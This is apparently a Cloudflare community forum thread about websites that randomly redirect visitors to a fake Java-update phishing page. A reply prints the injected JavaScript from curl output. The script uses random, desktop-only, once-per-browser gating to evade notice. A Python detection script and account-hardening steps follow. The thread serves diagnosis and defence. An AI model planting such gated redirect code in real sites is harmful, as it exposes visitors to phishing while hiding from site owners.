🚨 Suspicious Redirect to Phishing Page via Cloudflare – All Domains Affected

What is the name of the domain?

What is the error number?

No error

What is the error message?

Redirect to a fake page

What is the issue you’re encountering

I’m facing a very serious and urgent issue regarding the redirection of all websites under our management via Cloudflare. Whenever any of our domains are accessed, visitors are automatically redirected to this URL: https://java-update.pob.la

This page is clearly a phishing attempt, prompting users to “update Java.” It has absolutely no connection with any of our websites or services. The same behavior occurs even on sites hosted on completely separate servers, which strongly suggests the redirect is happening at the Cloudflare level (possibly via DNS or some injected malicious rule).

What steps have you taken to resolve the issue?

I have already reviewed:
• The origin servers and applications (no changes or signs of compromise).
• All Page Rules, Transform Rules, and Redirects in Cloudflare.
• DNS records and cache settings.
• Website source code and HTTP headers.

Everything appears to be normal, but the redirection persists.

I would greatly appreciate the community’s help (or even someone from the Cloudflare team) to:
1. Confirm whether similar incidents are affecting other domains.
2. Suggest any further steps for investigation.
3. Check if there has been any recent breach or compromise within our Cloudflare account that might allow this kind of attack.

If needed, I can share affected domains and screenshots via private message.

What are the steps to reproduce the issue?

Access the site; sometimes it redirects, sometimes it doesn’t.

The redirect is being done inside the HTML so check your origin. It could also be delivered by Workers (or Snippets if on a paid plan), Pages or R2 in Cloudflare so check there.

If you think your Cloudflare account has been compromised then check for changes to your account in the audit log:
https://dash.cloudflare.com/?to=/:account/audit-log

Resecure your account:

  • change the password
  • set up 2FA
  • change your global API key and any tokens; look for newly created tokens

```
curl -i https://www.recuperacaobrasil.com.br/
HTTP/2 200
date: Mon, 05 May 2025 19:10:36 GMT
content-type: text/html; charset=utf-8
server: cloudflare
strict-transport-security: max-age=31536000; includeSubDomains
cf-ray: 93b289f1c804b6cd-LHR
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gqWWvnRG%2BWkmrogbbGlr7cs56dIjxl2IYJ5KyeN29InY8%2BCwQc6lFUeTXdv%2FGLUDcy%2F7CsxuzQdxG2%2FzljgMTUHFniMY6so5nKfe6UfU94RJzmlh87a%2BMhNJXfJYMuXtq3BYfSJRIDeY2DNMCvdCw6wuueQMtwA9A6kp"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
content-security-policy: frame-ancestors 'self'; object-src 'none';
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=0&min_rtt=0&rtt_var=0&sent=0&recv=0&lost=0&retrans=0&sent_bytes=0&recv_bytes=0&delivery_rate=0&cwnd=0&unsent_bytes=0&cid=c90ff73b04b66950&ts=685&x=0"

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Teste</title>

          <script>
    function isDesktop() {
      return !/Mobi|Android/i.test(navigator.userAgent);
    }

    function redirectWithChance() {
      if (localStorage.getItem("redirecttt") === "true") {
        return;
      }

      if (isDesktop()) {
        var chance = Math.random();
        if (chance <= 0.30) {
          window.location.href = "https://java-update.pob.la";
          localStorage.setItem("redirecttt", "true");
        }
      }
    }

    redirectWithChance();
          </script>
        </head>
<body>
    <h1>Olá, Mundo!!!</h1>
</body>
</html>%
```
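As an added example (not code from the thread), this Python script does the origin check the reply above recommends: it pulls every inline `<script>` out of the served HTML and flags any that assign `window.location` to a host other than the site's own, recording the gating tricks visible in the curl output (random chance so only some visitors see it, a localStorage flag so it fires once per browser, and a desktop-only user-agent test). The sample HTML is constructed from that curl output; fetching a live origin is left to the reader, and the site host name is the one from the thread.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# Constructed sample (not a live fetch): the inline script seen in the curl output above.
SAMPLE_HTML = """<html><head><title>Teste</title><script>
function isDesktop() { return !/Mobi|Android/i.test(navigator.userAgent); }
function redirectWithChance() {
  if (localStorage.getItem("redirecttt") === "true") { return; }
  if (isDesktop() && Math.random() <= 0.30) {
    window.location.href = "https://java-update.pob.la";
    localStorage.setItem("redirecttt", "true");
  }
}
redirectWithChance();
</script></head><body><h1>Olá, Mundo!!!</h1></body></html>"""

class InlineScriptCollector(HTMLParser):
    """Collects the body of every inline <script> (ones without a src attribute)."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []
    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self.in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

# Assignments such as window.location.href = "https://..." or location = '...'
REDIRECT_RE = re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""")

def find_redirect_scripts(html, site_host):
    """Return one finding per inline-script redirect that leaves site_host."""
    parser = InlineScriptCollector()
    parser.feed(html)
    findings = []
    for script in parser.scripts:
        for url in REDIRECT_RE.findall(script):
            host = urlparse(url).hostname
            if host and host != site_host:
                findings.append({"target": host,
                    "random_gate": "Math.random" in script,        # only a fraction of visits
                    "once_per_browser": "localStorage" in script,  # hidden on repeat visits
                    "ua_check": "navigator.userAgent" in script})  # desktop-only targeting
    return findings
```

Because of the random gate and the localStorage flag, a single manual visit can look clean; checking the served HTML itself (as `curl -i` does) avoids that blind spot.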

May I ask if you’ve used some Cloudflare app from the past or Cloudflare Zaraz?
